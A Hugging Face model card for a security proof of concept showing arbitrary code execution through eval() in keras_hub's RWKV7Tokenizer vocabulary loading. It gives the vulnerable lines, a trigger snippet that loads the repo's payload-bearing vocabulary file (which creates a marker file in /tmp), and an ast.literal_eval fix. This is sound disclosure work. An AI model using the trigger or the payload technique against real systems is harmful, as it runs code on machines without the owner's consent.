YAML Metadata Warning:empty or missing yaml metadata in repo card
Check out the documentation for more information.
RWKV7 Tokenizer eval() RCE โ Proof of Concept
โ ๏ธ SECURITY RESEARCH โ DO NOT USE IN PRODUCTION โ ๏ธ
This repository demonstrates CVE-pending arbitrary code execution via
eval() in keras_hub.models.RWKV7Tokenizer vocabulary loading.
Vulnerability
keras_hub/src/models/rwkv7/rwkv7_tokenizer.py lines 117 and 275
call eval() on each line of vocabulary.txt during preset loading.
The vocabulary file in this repo contains a payload that executes
touch /tmp/keras_hub_rwkv7_pwned to prove code execution.
Trigger
import keras_hub
tokenizer = keras_hub.models.RWKV7Tokenizer.from_preset(
"hf://d3banjan/rwkv7-tokenizer-eval-rce-poc"
)
# Check: ls -la /tmp/keras_hub_rwkv7_pwned
Fix
Replace eval() with ast.literal_eval() at lines 117 and 275.
- Downloads last month
- 4
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐ Ask for provider support